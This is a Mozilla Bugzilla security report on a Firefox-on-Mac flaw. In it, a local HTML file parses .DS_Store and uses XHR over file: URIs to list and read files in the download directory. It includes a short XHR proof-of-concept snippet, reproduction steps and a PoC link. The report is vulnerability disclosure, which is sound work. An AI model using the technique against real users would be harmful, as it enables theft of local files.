Closed
Bug 1455644
Opened 7 years ago
Closed 5 years ago
local file information leak on Mac using .DS_Store file
Categories
(Core :: DOM: File, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 803143
People
(Reporter: llamakko, Unassigned)
Details
(4 keywords)
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Steps to reproduce:
# Prior knowledge
When opening a local HTML file in Firefox, it's possible to obtain files under the same directory.
## e.g.
### Directory structure
.
|-- parent
| |-- child
| | `-- child.txt
| |-- current.txt
| `-- test.html
`-- parent.txt
### test.html
```
<script>
let files = ['current.txt', '../parent.txt', 'child/child.txt'];
for (let file of files) {
let url = new URL(file, location.href).href;
let xhr = new XMLHttpRequest();
xhr.addEventListener('load', () => {
console.log('OK: ' + file);
});
xhr.addEventListener('error', () => {
console.log('NG: ' + file);
});
xhr.open('GET', url);
xhr.responseType = 'text';
xhr.send();
}
</script>
```
### Result
OK: current.txt
NG: ../parent.txt
OK: child/child.txt
# Required
Firefox must be set as the default browser for Mac.
# 1.
Please access the following page.
http://poc.vuln.jp/firefox/trunk/dsstore/
# 2.
A dialog will be displayed asking if you want to open a file, so just click on the "OK".
Actual results:
A list of files and directories in the download directory is displayed.
This is result of parsing .DS_Store file.
An attacker can use this list to acquire the contents of an arbitrary file via XHR and so forth.
Expected results:
I think that it would be better to reject cross-origin request of file: URI scheme.
In Google Chrome and Safari, this request is denied.
Updated•7 years ago
|
Flags: needinfo?(dveditz)
Updated•6 years ago
|
Group: firefox-core-security → core-security
Component: Untriaged → DOM: File
Product: Firefox → Core
Updated•6 years ago
|
Group: core-security → dom-core-security
Updated•6 years ago
|
Flags: needinfo?(dveditz)
Reporter | ||
Comment 1•6 years ago
|
||
Hi,
I updated the PoC located at http://poc.vuln.jp/firefox/trunk/dsstore/ .
In the past, parsing of .DS_Store was done through an external server, but now it can to parse .DS_Store with JavaScript (to use local only).
I think it will make the attack even easier.
I am sorry that my English is so bad.
If you have any questions or something you don't understand, just let me know anytime.
Comment 3•5 years ago
|
||
Right. Let me close it as dup.
Status: UNCONFIRMED → RESOLVED
Closed: 5 years ago
Flags: needinfo?(amarchesini)
Resolution: --- → DUPLICATE
Updated•5 years ago
|
Flags: sec-bounty-
Updated•2 years ago
|
Group: dom-core-security
Updated•8 months ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•